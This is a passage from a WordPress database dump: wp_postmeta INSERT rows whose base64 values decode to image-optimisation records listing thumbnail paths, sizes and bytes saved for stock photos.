5qcGciLCJyZWR1Y3Rpb24iOjU1MywidGltZSI6MTQ4MzU4MDcwNSwiaWQiOjg1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ5NiwidGltZSI6MTQ4MzU4MDcwOCwiaWQiOjg1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ5NiwidGltZSI6MTQ4MzU4MDcxMiwiaWQiOjg1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjc2OSwidGltZSI6MTQ4MzU4MDcxNiwiaWQiOjg1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MjczOTE2MC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MjczOTE2MC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MjczOTE2MC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NTIxLCJ0aW1lIjoxNDgzNTgwNzE5LCJpZCI6ODUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkyNzM5MTYwLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkyNzM5MTYwLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkyNzM5MTYwLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo2MTksInRpbWUiOjE0ODM1ODA3MjIsImlkIjo4NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY3MiwidGltZSI6MTQ4MzU4MDcyNiwiaWQiOjg1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MjczOTE2MC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MjczOTE2MC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185MjczOTE2MC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODM1LCJ0aW1lIjoxNDgzNTgwNzMwLCJpZCI6ODUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkyNzM5MTYwLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkyNzM5MTYwLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkyNzM5MTYwLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo5MzksInRpbWUiOjE0ODM1ODA3MzQsImlkIjo4NTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29932, 849, 'wpfc_optimisation_reduction', '9628'); 
INSERT INTO `wp_postmeta` VALUES (29933, 849, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjguanBnIiwid2lkdGgiOjQ5ODgsImhlaWdodCI6MzI5MiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MDczOCwiaWQiOiI4NDkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTEzLCJ0aW1lIjoxNDgzNTgwNzQyLCJpZCI6ODQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtODAweDUyOC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUyOCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTgwMHg1MjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC04MDB4NTI4LmpwZyIsInJlZHVjdGlvbiI6NzQ2LCJ0aW1lIjoxNDgzNTgwNzQ2LCJpZCI6ODQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtNzY4eDUwNy5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUwNywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTc2OHg1MDcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC03Njh4NTA3LmpwZyIsInJlZHVjdGlvbiI6NzQyLCJ0aW1lIjoxNDgzNTgwNzUwLCJpZCI6ODQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtMTYwMHgxMDU2LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNTYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0xNjAweDEwNTYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0xNjAweDEwNTYuanBnIiwicmVkdWN0aW9uIjoyNzI5LCJ0aW1lIjoxNDgzNTgwNzU1LCJpZCI6ODQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTExLCJ0aW1lIjoxNDgzNTgwNzU4LCJpZCI6ODQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDEyLCJ0aW1lIjoxNDgzNTgwNzYxLCJpZCI6ODQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDUyLCJ0aW1lIjoxNDgzNTgwNzY1LCJpZCI6ODQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NjU2LCJ0aW1lIjoxNDgzNTgwNzY5LCJpZCI6ODQ5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0NTQsInRpbWUiOjE0ODM1ODA3NzIsImlkIjo4NDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjUwNiwidGltZSI6MTQ4MzU4MDc3NSwiaWQiOjg0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjI2LCJ0aW1lIjoxNDgzNTgwNzc5LCJpZCI6ODQ5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MDQsInRpbWUiOjE0ODM1ODA3ODMsImlkIjo4NDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU5ODk0NzI4LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1OTg5NDcyOC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTk4OTQ3MjgtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjY3NywidGltZSI6MTQ4MzU4MDc4NiwiaWQiOjg0OX1d'); 
INSERT INTO `wp_postmeta` VALUES (29934, 845, 'wpfc_optimisation_reduction', '11153'); 
INSERT INTO `wp_postmeta` VALUES (29935, 845, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTIuanBnIiwid2lkdGgiOjQ1MDAsImhlaWdodCI6MzAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MDc5MSwiaWQiOiI4NDUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTg4LCJ0aW1lIjoxNDgzNTgwNzk1LCJpZCI6ODQ1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTEzMiwidGltZSI6MTQ4MzU4MDc5OSwiaWQiOjg0NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMzMDk0NzEyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMzA5NDcxMi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzMwOTQ3MTItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEwMzAsInRpbWUiOjE0ODM1ODA4MDMsImlkIjo4NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJ